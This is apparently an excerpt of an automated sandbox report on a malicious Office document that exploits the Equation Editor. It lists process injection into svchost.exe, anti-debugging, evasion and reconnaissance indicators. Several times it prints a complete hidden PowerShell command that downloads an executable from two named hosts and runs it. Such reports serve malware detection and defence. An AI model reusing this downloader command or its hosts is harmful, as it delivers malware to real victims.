Document has a 'vbamacros' value indicative of goodware
Source: VBA869.tmp.14.dr Initial sample: OLE indicators vbamacros = False

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: B0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10001000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10010000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10014000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10017000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Memory written: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10000000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Thread register set: target process: 2780
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Thread register set: target process: 2992
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Thread register set: target process: 3060
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 60000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: B0000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: EE2104
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10000000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10001000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10014000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10017000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 20000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 130000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010018
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 1001001C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010020
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010024
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010028
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 1001002C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010030
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010034
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010038
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 1001003C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010040
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010044
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010048
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 1001004C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010050
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010054
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010058
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 1001005C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Memory written: C:\Windows\System32\svchost.exe base: 10010060
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Contains functionality to create a new security descriptor
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E6E00 VariantClear,VariantInit,GetCurrentProcess,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,18_2_001E6E00
May try to detect the Windows Explorer process (often used for injection)
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmp Binary or memory string: Progman
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmp Binary or memory string: Program Manager
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmp Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001F2F40 rdtsc 18_2_001F2F40
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,18_2_00415D50
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001F1F60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap,18_2_001F1F60
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E9640 SetUnhandledExceptionFilter,18_2_001E9640
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E2C63 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_001E2C63
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_00179640 SetUnhandledExceptionFilter,21_2_00179640
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_00172C63 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00172C63
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory allocated: page read and write | page guard

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001F2F40 rdtsc 18_2_001F2F40
Contains functionality to query network adapter information
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: GetAdaptersInfo,GetAdaptersInfo,18_2_001F0E90
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: GetAdaptersInfo,GetAdaptersInfo,GetAdaptersInfo,21_2_00180E90
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Window / User API: threadDelayed 36115
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Window / User API: threadDelayed 463886
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Window / User API: threadDelayed 36877
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Window / User API: threadDelayed 463124
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Window / User API: threadDelayed 1000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Window / User API: threadDelayed 492163
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Window / User API: threadDelayed 7838
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Window / User API: threadDelayed 998
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972 Thread sleep count: 50 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032 Thread sleep time: -922337203685477s >= -60000s
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2776 Thread sleep count: 36877 > 30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2776 Thread sleep count: 463124 > 30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2984 Thread sleep count: 1000 > 30
Source: C:\Windows\System32\taskeng.exe TID: 2672 Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2528 Thread sleep count: 492163 > 30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2528 Thread sleep count: 7838 > 30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 3080 Thread sleep count: 998 > 30
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E2530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,18_2_001E2530
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_00172530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,21_2_00172530
Contains functionality to query system information
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E4A60 GetVersionExW,GetModuleHandleW,GetProcAddress,GetSystemInfo,18_2_001E4A60
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Hooking and other Techniques for Hiding and Protection:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Network Connect: 87.247.241.143 80
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001EEDA0 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,18_2_001EEDA0
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Process information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE | Queries volume information: C:\Users\user~1\AppData\Local\Temp\OICE_BD2C3A33-BC6C-4098-A16D-51A8AA25C09C.0\FLEA0B.tmp VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001E71D1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,18_2_001E71D1
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001E4380 GetUserNameW,18_2_001E4380
Contains functionality to query the Windows version
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001EEDA0 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,18_2_001EEDA0
Queries the cryptographic machine GUID
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph
